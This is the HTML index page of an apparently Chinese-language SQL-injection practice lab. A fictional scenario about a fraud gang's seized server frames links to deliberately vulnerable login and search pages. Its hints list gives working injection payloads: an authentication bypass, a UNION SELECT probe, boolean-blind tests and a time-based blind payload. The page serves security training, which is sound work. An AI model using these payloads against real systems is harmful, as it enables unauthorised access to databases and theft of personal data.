<!DOCTYPE html>
<html>
<head>
    <title>SQL注入测试系统(靶机)</title>
</head>
<body>
<h1>SQL注入测试训练场</h1>
<p>警察在破获某诈骗团伙的服务器时，发现服务器正在运行着两个服务，一个页面可以用来登录，一个页面用来搜索某数据</p>
<p>
    警方说此服务器的数据库里有许多被害人的信息，可是现在没有管理员密码，打不开，现在请你获取到数据库的管理员密码，以及诸多被害人的信息</p>
<ul>
    <li><a href="/login">登录页面(不安全，存在注入漏洞)</a></li>
    <li><a href="/search">搜索页面(不安全，存在注入漏洞)</a></li>
</ul>
<h3>提示:</h3>
<ul>
    <li>正常登录: alice / ??????</li>
    <li>嘿嘿，密码我藏起来了</li>
    <li>SQL注入尝试: ' OR '1'='1' --</li>
    <li>联合查询: ' UNION SELECT 1,2,3,4 --</li>
    <ul>
        <li>盲注尝试: admin' AND 1=1 --</li>
        <li>思考：admin' AND 1=2 -- 是否会成功？</li>
    </ul>
    <li>时间盲注测试:admin' AND (SELECT CASE WHEN (1=1) THEN 1 ELSE 1=randomblob(100000000) END) --</li>
    <li></li>
</ul>
</body>
</html>